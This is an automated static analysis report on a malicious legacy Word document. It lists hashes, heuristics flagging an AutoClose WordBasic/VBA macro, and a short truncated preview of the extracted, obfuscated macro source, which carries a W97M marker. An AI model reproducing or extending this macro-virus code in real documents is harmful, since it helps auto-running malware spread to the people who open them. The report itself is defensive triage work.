Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ea8e70d8f483e64e…

MALICIOUS

Office (OLE)

Size: 50.5 KB
Created: 1998-06-22 22:28:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: ea635257efef815dac9b4410dc5e3022
SHA-1: 591884c794d52661091199f4581ef25c1c549b23
SHA-256: ea8e70d8f483e64e6b41b4ff2fb12c8f0b48ed5bc3db4e609da1c45e06c9aee0
Risk score: 82

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Microsoft Word document containing a WordBasic AutoClose macro. This macro is designed to execute automatically when the document is closed, indicating a malicious intent to run arbitrary code. The macro appears to be obfuscated, and further analysis would be required to determine the exact payload.

Heuristics (4)

  • VBA macros detected (severity: medium, 1 related finding) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Auto_Close macro (severity: high) [OLE_VBA_AUTOCLOSE]
    Auto_Close macro present.
  • Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface; by itself it is not an attribution to a downloader or a parser CVE.
  • Suspicious extracted artifact (severity: info) [EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16111 bytes
SHA-256: c0a12921a00cf390a5654ec6449cf2e6452c959747013a74e41ab89a066479bf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
The carved artifact contains 3 long base64-like blobs.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Ol354"
Rem C293N807B54M314J509Q450H74J572R579O806J796Q692Q192R69F949S219E236U257G713P772R308S718U222I552I204N629D60O837O424E494V768I484M673B647U340D425R357J746
Rem G751U821E108A151I187W871N728D257B827R790H450M802M203F364N343M425N49

Sub AutoClose()

    ' Word2000                       
    ' =======================================                              %W97M. D425R357J746
... (truncated)